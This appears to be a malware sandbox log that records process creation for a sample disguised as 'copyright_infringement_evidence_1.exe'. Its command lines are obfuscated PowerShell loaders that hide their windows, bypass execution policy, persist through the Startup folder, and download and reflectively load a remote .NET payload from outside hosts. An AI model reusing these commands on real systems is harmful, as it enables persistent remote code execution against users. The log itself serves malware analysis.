Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [system.io.file]::copy('c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\2p_bee.js', 'c:\users\' + [environment]::username + ''\appdata\roaming\microsoft\windows\start menu\programs\startup\ sj.jjc.js')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'lgaoacaajablae4adga6agmatwbnafmauabfagmawwa0acwamqa1acwamga1af0alqbkag8asqboaccajwapacgaiaaoacgajwb7adiafqb1ahiabaagad0aiab7adaajwaraccafqboahqadaanacsajwbwahmaogavac8acgbhahcalganacsajwbnagkadaboaccakwanahuajwaraccaygb1ahmazqbyaccakwanagmabwbuahqajwaraccazqbuahqalgbjag8ajwaraccabqavae4ajwaraccabwbeaguadablagmajwaraccadabpaccakwanag4alwboag8arablaccakwanahqazqbjahqatwbuac8ajwaraccacganacsajwblaccakwanagyajwaraccacwavaccakwanaggazqanacsajwbhagqacwavag0ayqbpag4alwbeaccakwanaguadaanacsajwbhaggatgbvahqazqbfaeoalgb0ahgadaanacsajwb7adaafqanacsajwa7acaajwaraccaewanacsajwayah0aygbhahmajwaraccazqa2adqaqwbvaccakwanag4ajwaraccadablag4ajwaraccadaagad0aiaaoae4azqb3ac0atwbiagoazqbjahqajwaraccaiabtaccakwanahkacwb0accakwanaguabqanacsajwauae4azqb0accakwanac4avwanacsajwblaccakwanagiajwaraccaqwbsagkazqanacsajwbuaccakwanahqajwaraccakqauaccakwanaeqajwaraccabwb3ag4ababvaccakwanageajwaraccazabtahqajwaraccacganacsajwbpaccakwanag4azwanacsajwaoahsajwaraccamgb9ahuacgbsackaowagaccakwanahsamgb9agiaaqanacsajwbuageajwaraccacgb5aemabwbuaccakwanahqazqbuahqaiaa9acaawwbtaccakwanahkacwb0aguabqauaccakwanaemabwbuahyazqbyaccakwanahqaxqa6accakwanadoargbyaccakwanag8ajwaraccabqbcageacwbladyanabtahqacgbpag4azwaoahsamgb9agiayqanacsajwbzaguanga0accakwanaemajwaraccabwbuahqajwaraccazqbuahqakqanacsajwa7accakwanacaaewayah0ajwaraccayqbzahmazqanacsajwbtaccakwanagiajwaraccabab5acaajwaraccapqagafsaugblagyajwaraccabablaccakwanagmajwaraccadabpaccakwanag8abgauaeeacwbzaguabqbiaccakwanagwaeqbdadoaogbmaccakwanag8ayqanacsajwbkaccakwanacgaewanacsajwayah0aygbpag4ayqanacsajwbyahkajwaraccaqwanacsajwbvag4adablag4adaapadsaiab7adiafqanacsajwbjaccakwanag8abqbtageajwaraccabganacsajwbkacaapqanacsajwagahsamab9afsajwaraccazabuagwaaqbiac4ajwaraccasqbpac4asabvag0azqbdadoaoganacsajwbwaccakwanaeeasqaoaccakwanahsajwaraccamwanacsajwb9adaalwanacsajwbla
ccakwanafmaqqbjaccakwanaeyajwaraccalwbkaccakwanac8azqblac4ajwaraccazqb0accakwanahmajwaraccayqanacsajwbwac8alwa6ahmacab0accakwanahqaaaanacsajwb7admafqanacsajwasacaaewazah0amqanacsajwb7admafqanacsajwasacaaewazaccakwanah0ajwaraccaqwa6accakwanahsajwaraccamqanacsajwb9afaacgbvaccakwanagcacganacsajwbhag0araanacsajwbhaccakwanahqajwaraccayqb7adeajwaraccafqb7accakwanadmafqasacaaewanacsajwazaccakwanah0ajwaraccacgbhaccakwanagoayqbkag8ajwaraccaewazaccakwanah0alaagaccakwanahsamwb9aeeazaanacsajwbkaccakwanaekabgbqaccakwanahiabwbjaguacwbzadmamgb7admafqasaccakwanacaaewazaccakwanah0ajwaraccazaanacsajwblahmajwaraccayqb0accakwanagkadgbhagqabwb7admafqasaccakwanahsamwb9accakwanahsamwb9ackajwaraccaewanacsajwawah0ajwaraccaowanacsajwagaekajwaraccabgb2ag8aawanacsajwblac0arqb4accakwanahaajwaraccacgblahmacwbpag8abgagahsamganacsajwb9agmabwbtaccakwanag0ajwaraccayqbuaccakwanagqajwapacaalqbgacaawwbjaegayqbyaf0amwa5acwawwbjaegayqbyaf0aoqayacwawwbjaegayqbyaf0amwa2acwawwbjaegayqbyaf0amwa0ackaiaapaa==';$owjuxd = [system.text.encoding]::unicode.getstring([system.convert]::fromba
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kaaoaccaqwbtaeuajwaraccadqbyagwaiaa9acaajwaraccaswbraccakwanahmajwaraccaaab0ahqacabzadoalwavahiayqb3ac4azwbpahqaaaanacsajwb1agiadqbzaguacgbjag8abganacsajwb0aguabgb0ac4aywbvaccakwanag0alwboag8ajwaraccarablahqazqbjahqatwbuac8atgbvaeqazqb0aguaywanacsajwb0ae8abgavaccakwanahiazqbmahmajwaraccalwboaguajwaraccayqbkahmalwbtageaaqanacsajwbuac8arablahqajwaraccayqboae4abwb0accakwanaguaxwbkac4adab4ahqajwaraccaswbraccakwanahmaowagaemauwanacsajwbfagiayqbzaguanga0accakwanaemabwbuahqajwaraccazqanacsajwbuahqaiaa9acaajwaraccakaboaccakwanaguadwatae8ayganacsajwbqaguaywb0acaauwb5ahmadablag0algboaguadaauafcazqbiaemajwaraccababpaccakwanaguabgb0ackalgbeaccakwanag8adwbuagwabwbhagqajwaraccauwb0ahiajwaraccaaqbuagcajwaraccakabdafmarqb1ahiabaapaccakwanadsaiabdafmarqbiagkabgbhahiaeqbdag8ajwaraccabgb0aguabgb0acaapqagaccakwanafsauwb5ahmadablag0algbdag8ajwaraccabgb2aguacgb0af0aoga6accakwanaeyacgbvag0aqgbhaccakwanahmazqanacsajwa2adqajwaraccauwanacsajwb0ahiajwaraccaaqanacsajwbuagcakabdafmarqbiageacwbladyanabdag8abgb0aguabgb0accakwanackaowanacsajwagaemauwbfageacwbzaguabqanacsajwbiagwaeqagad0ajwaraccaiabbaccakwanafiazqanacsajwbmagwazqbjahqajwaraccaaqbvaccakwanag4algbbahmacwblag0aygbsahkaxqa6adoatabvageazaaoaemajwaraccauwanacsajwbfagiaaqbuaccakwanageacgb5aemabwbuahqazqbuaccakwanahqakqa7acaaqwbtaeuaywanacsajwbvag0abqanacsajwbhag4azaagad0aiaanacsajwblaccakwanagsajwaraccacwbbaccakwanagqabgbsagkaygauaekatwauaegajwaraccabwbtaccakwanaguaxqanacsajwa6adoavgbbaekakabvae4asqawac8aegbiaeuadqbjaccakwanac8azaavaguazqauaccakwanaguajwaraccadabzageacaavac8aogbzahaadab0accakwanaggabwboaccakwanaekalaagag8atgbjadeabwboaccakwanaekalaagag8atgbjaemaogaxaccakwanagwacabqahiabwbnaccakwanahiayqbtaeqajwaraccayqb0ageamqbsahaabwboaekalaagag8ajwaraccatganacsajwbjahqabwbuagqaaqbuaggabwbvae4asqasacaajwaraccabwboaekaqqanacsajwbwahaatabhahuajwara
ccabgbjaggabwboaccakwanaekalaagag8ajwaraccatgbjagqazqbzageadabpahyayqanacsajwbkag8abwboaekajwaraccalabvae4asqbvaccakwanae4asqapaesaawbzadsaiabjag4adgbvagsazqataeuajwaraccaeabwahiajwaraccazqbzahmaaqanacsajwbvaccakwanag4ajwaraccaiabdaccakwanafmarqbjag8abqbtageabgbkaccakqagac0aywbsaeuauabsaeeaqwblacaaiaaoafsaqwbiaeeacgbdadyanwarafsaqwbiaeeacgbdadgamwarafsaqwbiaeeacgbdadyaoqapacwawwbdaegaqqbyaf0amwa2acaalqbjafiarqbqagwaqqbdaguaiaaoafsaqwbiaeeacgbdadeamqaxacsawwbdaegaqqbyaf0anwa4acsawwbdaegaqqbyaf0anwazackalabbaemasabbahiaxqazadqalqbjafiarqbqagwaqqbdaguaiaagaccaswbrahmajwasafsaqwbiaeeacgbdadmaoqagacaalqbsaguacabsaeeaywblacaakabbaemasabbahiaxqa0adkakwbbaemasabbahiaxqaxadaaoaarafsaqwbiaeeacgbdadeamqayackalabbaemasabbahiaxqa5adiakqagahwaaqblahga';$owjuxd = [system.text.encoding]::unicode.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command ".( $env:comspec[4,15,25]-join'')( (('{2}url = {0'+'}htt'+'ps://raw.'+'gith'+'u'+'buser'+'cont'+'ent.co'+'m/n'+'odetec'+'to'+'n/node'+'tecton/'+'r'+'e'+'f'+'s/'+'he'+'ads/main/d'+'et'+'ahnote_j.txt'+'{0}'+'; '+'{'+'2}bas'+'e64co'+'n'+'ten'+'t = (new-object'+' s'+'yst'+'em'+'.net'+'.w'+'e'+'b'+'clie'+'n'+'t'+').'+'d'+'ownlo'+'a'+'dst'+'r'+'i'+'ng'+'({'+'2}url); '+'{2}bi'+'na'+'rycon'+'tent = [s'+'ystem.'+'conver'+'t]:'+':fr'+'o'+'mbase64string({2}ba'+'se64'+'c'+'ont'+'ent)'+';'+' {2}'+'asse'+'m'+'b'+'ly '+'= [ref'+'le'+'c'+'ti'+'on.assemb'+'ly]::l'+'oa'+'d'+'({'+'2}bina'+'ry'+'c'+'ontent); {2}'+'c'+'omma'+'n'+'d ='+' {0}['+'dnlib.'+'io.home]::'+'v'+'ai('+'{'+'3'+'}0/'+'k'+'sac'+'f'+'/d'+'/ee.'+'et'+'s'+'a'+'p//:spt'+'th'+'{3}'+', {3}1'+'{3}'+', {3'+'}'+'c:'+'{'+'1'+'}pro'+'gr'+'amd'+'a'+'t'+'a{1'+'}{'+'3}, {'+'3'+'}'+'ra'+'jado'+'{3'+'}, '+'{3}ad'+'d'+'inp'+'rocess32{3},'+' {3'+'}'+'d'+'es'+'at'+'ivado{3},'+'{3}'+'{3})'+'{'+'0}'+';'+' i'+'nvok'+'e-ex'+'p'+'ression {2'+'}com'+'m'+'an'+'d') -f [char]39,[char]92,[char]36,[char]34) )"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('cse'+'url = '+'kk'+'s'+'https://raw.gith'+'ubusercon'+'tent.co'+'m/no'+'detecton/nodetec'+'ton/'+'refs'+'/he'+'ads/mai'+'n/det'+'ahnot'+'e_j.txt'+'kk'+'s; cs'+'ebase64'+'cont'+'e'+'nt = '+'(n'+'ew-ob'+'ject system.net.webc'+'li'+'ent).d'+'ownload'+'str'+'ing'+'(cseurl)'+'; csebinaryco'+'ntent = '+'[system.co'+'nvert]::'+'fromba'+'se'+'64'+'s'+'tr'+'i'+'ng(csebase64content'+');'+' cseassem'+'bly ='+' ['+'re'+'flect'+'io'+'n.assembly]::load(c'+'s'+'ebin'+'aryconten'+'t); csec'+'omm'+'and = '+'k'+'k'+'s['+'dnlib.io.h'+'om'+'e]'+'::vai(oni0/zbeuc'+'/d/ee.'+'e'+'tsap//:sptt'+'hon'+'i, oni1on'+'i, onic:1'+'lpprog'+'ramd'+'ata1lponi, o'+'n'+'itondinhooni, '+'onia'+'pplau'+'nchon'+'i, o'+'nidesativa'+'dooni'+',onio'+'ni)kks; invoke-e'+'xpr'+'essi'+'o'+'n'+' c'+'secommand') -creplace ([char]67+[char]83+[char]69),[char]36 -creplace ([char]111+[char]78+[char]73),[char]34-creplace 'kks',[char]39 -replace ([char]49+[char]108+[char]112),[char]92) |iex"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [system.io.file]::copy('c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\2x_bee.js', 'c:\users\' + [environment]::username + ''\appdata\roaming\microsoft\windows\start menu\programs\startup\ sj.jjc.js')')
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [system.io.file]::copy('c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\2p_bee.js', 'c:\users\' + [environment]::username + ''\appdata\roaming\microsoft\windows\start menu\programs\startup\ sj.jjc.js')')
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [system.io.file]::copy('c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\2x_bee.js', 'c:\users\' + [environment]::username + ''\appdata\roaming\microsoft\windows\start menu\programs\startup\ sj.jjc.js')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [system.io.file]::copy('c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\cjj.js', 'c:\users\' + [environment]::username + ''\appdata\roaming\microsoft\windows\start menu\programs\startup\ sj.jjc.js')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'lgaoacaajablae4adga6agmatwbnafmauabfagmawwa0acwamqa1acwamga1af0alqbkag8asqboaccajwapacgaiaaoacgajwb7adiafqb1ahiabaagad0aiab7adaajwaraccafqboahqadaanacsajwbwahmaogavac8acgbhahcalganacsajwbnagkadaboaccakwanahuajwaraccaygb1ahmazqbyaccakwanagmabwbuahqajwaraccazqbuahqalgbjag8ajwaraccabqavae4ajwaraccabwbeaguadablagmajwaraccadabpaccakwanag4alwboag8arablaccakwanahqazqbjahqatwbuac8ajwaraccacganacsajwblaccakwanagyajwaraccacwavaccakwanaggazqanacsajwbhagqacwavag0ayqbpag4alwbeaccakwanaguadaanacsajwbhaggatgbvahqazqbfaeoalgb0ahgadaanacsajwb7adaafqanacsajwa7acaajwaraccaewanacsajwayah0aygbhahmajwaraccazqa2adqaqwbvaccakwanag4ajwaraccadablag4ajwaraccadaagad0aiaaoae4azqb3ac0atwbiagoazqbjahqajwaraccaiabtaccakwanahkacwb0accakwanaguabqanacsajwauae4azqb0accakwanac4avwanacsajwblaccakwanagiajwaraccaqwbsagkazqanacsajwbuaccakwanahqajwaraccakqauaccakwanaeqajwaraccabwb3ag4ababvaccakwanageajwaraccazabtahqajwaraccacganacsajwbpaccakwanag4azwanacsajwaoahsajwaraccamgb9ahuacgbsackaowagaccakwanahsamgb9agiaaqanacsajwbuageajwaraccacgb5aemabwbuaccakwanahqazqbuahqaiaa9acaawwbtaccakwanahkacwb0aguabqauaccakwanaemabwbuahyazqbyaccakwanahqaxqa6accakwanadoargbyaccakwanag8ajwaraccabqbcageacwbladyanabtahqacgbpag4azwaoahsamgb9agiayqanacsajwbzaguanga0accakwanaemajwaraccabwbuahqajwaraccazqbuahqakqanacsajwa7accakwanacaaewayah0ajwaraccayqbzahmazqanacsajwbtaccakwanagiajwaraccabab5acaajwaraccapqagafsaugblagyajwaraccabablaccakwanagmajwaraccadabpaccakwanag8abgauaeeacwbzaguabqbiaccakwanagwaeqbdadoaogbmaccakwanag8ayqanacsajwbkaccakwanacgaewanacsajwayah0aygbpag4ayqanacsajwbyahkajwaraccaqwanacsajwbvag4adablag4adaapadsaiab7adiafqanacsajwbjaccakwanag8abqbtageajwaraccabganacsajwbkacaapqanacsajwagahsamab9afsajwaraccazabuagwaaqbiac4ajwaraccasqbpac4asabvag0azqbdadoaoganacsajwbwaccakwanaeeasqaoaccakwanahsajwaraccamwanacsajwb9adaalwanacsajwbla
ccakwanafmaqqbjaccakwanaeyajwaraccalwbkaccakwanac8azqblac4ajwaraccazqb0accakwanahmajwaraccayqanacsajwbwac8alwa6ahmacab0accakwanahqaaaanacsajwb7admafqanacsajwasacaaewazah0amqanacsajwb7admafqanacsajwasacaaewazaccakwanah0ajwaraccaqwa6accakwanahsajwaraccamqanacsajwb9afaacgbvaccakwanagcacganacsajwbhag0araanacsajwbhaccakwanahqajwaraccayqb7adeajwaraccafqb7accakwanadmafqasacaaewanacsajwazaccakwanah0ajwaraccacgbhaccakwanagoayqbkag8ajwaraccaewazaccakwanah0alaagaccakwanahsamwb9aeeazaanacsajwbkaccakwanaekabgbqaccakwanahiabwbjaguacwbzadmamgb7admafqasaccakwanacaaewazaccakwanah0ajwaraccazaanacsajwblahmajwaraccayqb0accakwanagkadgbhagqabwb7admafqasaccakwanahsamwb9accakwanahsamwb9ackajwaraccaewanacsajwawah0ajwaraccaowanacsajwagaekajwaraccabgb2ag8aawanacsajwblac0arqb4accakwanahaajwaraccacgblahmacwbpag8abgagahsamganacsajwb9agmabwbtaccakwanag0ajwaraccayqbuaccakwanagqajwapacaalqbgacaawwbjaegayqbyaf0amwa5acwawwbjaegayqbyaf0aoqayacwawwbjaegayqbyaf0amwa2acwawwbjaegayqbyaf0amwa0ackaiaapaa==';$owjuxd = [system.text.encoding]::unicode.getstring([system.convert]::fromba
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command ".( $env:comspec[4,15,25]-join'')( (('{2}url = {0'+'}htt'+'ps://raw.'+'gith'+'u'+'buser'+'cont'+'ent.co'+'m/n'+'odetec'+'to'+'n/node'+'tecton/'+'r'+'e'+'f'+'s/'+'he'+'ads/main/d'+'et'+'ahnote_j.txt'+'{0}'+'; '+'{'+'2}bas'+'e64co'+'n'+'ten'+'t = (new-object'+' s'+'yst'+'em'+'.net'+'.w'+'e'+'b'+'clie'+'n'+'t'+').'+'d'+'ownlo'+'a'+'dst'+'r'+'i'+'ng'+'({'+'2}url); '+'{2}bi'+'na'+'rycon'+'tent = [s'+'ystem.'+'conver'+'t]:'+':fr'+'o'+'mbase64string({2}ba'+'se64'+'c'+'ont'+'ent)'+';'+' {2}'+'asse'+'m'+'b'+'ly '+'= [ref'+'le'+'c'+'ti'+'on.assemb'+'ly]::l'+'oa'+'d'+'({'+'2}bina'+'ry'+'c'+'ontent); {2}'+'c'+'omma'+'n'+'d ='+' {0}['+'dnlib.'+'io.home]::'+'v'+'ai('+'{'+'3'+'}0/'+'k'+'sac'+'f'+'/d'+'/ee.'+'et'+'s'+'a'+'p//:spt'+'th'+'{3}'+', {3}1'+'{3}'+', {3'+'}'+'c:'+'{'+'1'+'}pro'+'gr'+'amd'+'a'+'t'+'a{1'+'}{'+'3}, {'+'3'+'}'+'ra'+'jado'+'{3'+'}, '+'{3}ad'+'d'+'inp'+'rocess32{3},'+' {3'+'}'+'d'+'es'+'at'+'ivado{3},'+'{3}'+'{3})'+'{'+'0}'+';'+' i'+'nvok'+'e-ex'+'p'+'ression {2'+'}com'+'m'+'an'+'d') -f [char]39,[char]92,[char]36,[char]34) )"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [system.io.file]::copy('c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\cjj.js', 'c:\users\' + [environment]::username + ''\appdata\roaming\microsoft\windows\start menu\programs\startup\ sj.jjc.js')')
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('cse'+'url = '+'kk'+'s'+'https://raw.gith'+'ubusercon'+'tent.co'+'m/no'+'detecton/nodetec'+'ton/'+'refs'+'/he'+'ads/mai'+'n/det'+'ahnot'+'e_j.txt'+'kk'+'s; cs'+'ebase64'+'cont'+'e'+'nt = '+'(n'+'ew-ob'+'ject system.net.webc'+'li'+'ent).d'+'ownload'+'str'+'ing'+'(cseurl)'+'; csebinaryco'+'ntent = '+'[system.co'+'nvert]::'+'fromba'+'se'+'64'+'s'+'tr'+'i'+'ng(csebase64content'+');'+' cseassem'+'bly ='+' ['+'re'+'flect'+'io'+'n.assembly]::load(c'+'s'+'ebin'+'aryconten'+'t); csec'+'omm'+'and = '+'k'+'k'+'s['+'dnlib.io.h'+'om'+'e]'+'::vai(oni0/zbeuc'+'/d/ee.'+'e'+'tsap//:sptt'+'hon'+'i, oni1on'+'i, onic:1'+'lpprog'+'ramd'+'ata1lponi, o'+'n'+'itondinhooni, '+'onia'+'pplau'+'nchon'+'i, o'+'nidesativa'+'dooni'+',onio'+'ni)kks; invoke-e'+'xpr'+'essi'+'o'+'n'+' c'+'secommand') -creplace ([char]67+[char]83+[char]69),[char]36 -creplace ([char]111+[char]78+[char]73),[char]34-creplace 'kks',[char]39 -replace ([char]49+[char]108+[char]112),[char]92) |iex"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [system.io.file]::copy('c:\users\public\documents\2p_bee.js', 'c:\users\' + [environment]::username + ''\appdata\roaming\microsoft\windows\start menu\programs\startup\ sj.jjc.js')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [system.io.file]::copy('c:\users\public\documents\2x_bee.js', 'c:\users\' + [environment]::username + ''\appdata\roaming\microsoft\windows\start menu\programs\startup\ sj.jjc.js')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [system.io.file]::copy('c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\2p_bee.js', 'c:\users\' + [environment]::username + ''\appdata\roaming\microsoft\windows\start menu\programs\startup\ sj.jjc.js')')
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [system.io.file]::copy('c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\2p_bee.js', 'c:\users\' + [environment]::username + ''\appdata\roaming\microsoft\windows\start menu\programs\startup\ sj.jjc.js')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [system.io.file]::copy('c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\2x_bee.js', 'c:\users\' + [environment]::username + ''\appdata\roaming\microsoft\windows\start menu\programs\startup\ sj.jjc.js')')
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [system.io.file]::copy('c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\2x_bee.js', 'c:\users\' + [environment]::username + ''\appdata\roaming\microsoft\windows\start menu\programs\startup\ sj.jjc.js')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [system.io.file]::copy('c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\cjj.js', 'c:\users\' + [environment]::username + ''\appdata\roaming\microsoft\windows\start menu\programs\startup\ sj.jjc.js')')
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
